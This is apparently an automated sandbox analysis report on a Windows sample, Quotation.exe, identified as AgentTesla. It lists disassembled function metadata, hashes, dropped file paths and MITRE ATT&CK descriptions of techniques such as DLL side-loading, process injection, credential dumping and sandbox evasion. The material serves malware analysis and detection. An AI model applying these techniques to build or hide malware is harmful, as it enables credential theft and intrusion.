Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B

Memory Dump Source

Source File: 00000006.00000002.2774680857.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2774662015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774698645.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774718784.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774832518.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000006.00000002.2774680857.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2774662015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774698645.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774718784.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.2774832518.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 3AB48AC0 Relevance: 5.3, Strings: 4, Instructions: 262COMMON

Download Yara Rule

Strings

XM, xrefs: 3AB48E4F
T48, xrefs: 3AB48CB9
DR48, xrefs: 3AB48C82
XM, xrefs: 3AB48D45

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: DR48$XM$XM$T48
API String ID: 0-2741422437
Opcode ID: c69575a1b75258cc9935391ead9064b2fffefbf67ca17e16591b436fc1c2fc05
Instruction ID: b837a3514bc3c88ca4c09e5e794e144e8f92b7ea573647f4ba2fbc188eda9953
Opcode Fuzzy Hash: c69575a1b75258cc9935391ead9064b2fffefbf67ca17e16591b436fc1c2fc05
Instruction Fuzzy Hash: DBA14B74B012158FEB58DF78C850BAEB7B2EF89300F1485A9D409AB351DF369D82DB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll

C:\Users\user\Music\antithetic.ini

C:\Users\user\overlays\besvangredes\Emmens.udk

C:\Users\user\overlays\besvangredes\Konditorierne\Trikstanks.pra

C:\Users\user\overlays\besvangredes\Konditorierne\boyaus.rom

C:\Users\user\overlays\besvangredes\Konditorierne\gear.dra

C:\Users\user\overlays\besvangredes\Konditorierne\jagtfalk.ill

C:\Users\user\overlays\besvangredes\Konditorierne\regill.ful

C:\Users\user\overlays\besvangredes\Konditorierne\sortlistningens.txt

C:\Users\user\overlays\besvangredes\Modernized.Fil

C:\Users\user\overlays\besvangredes\Proprietrer.bet

C:\Users\user\overlays\besvangredes\Revolutionsraadets.Bim

Static File Info

General

File Icon

Windows Analysis Report
Quotation.exe

Function 004036DA Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 416
stringfilecomCOMMON

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A1C Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre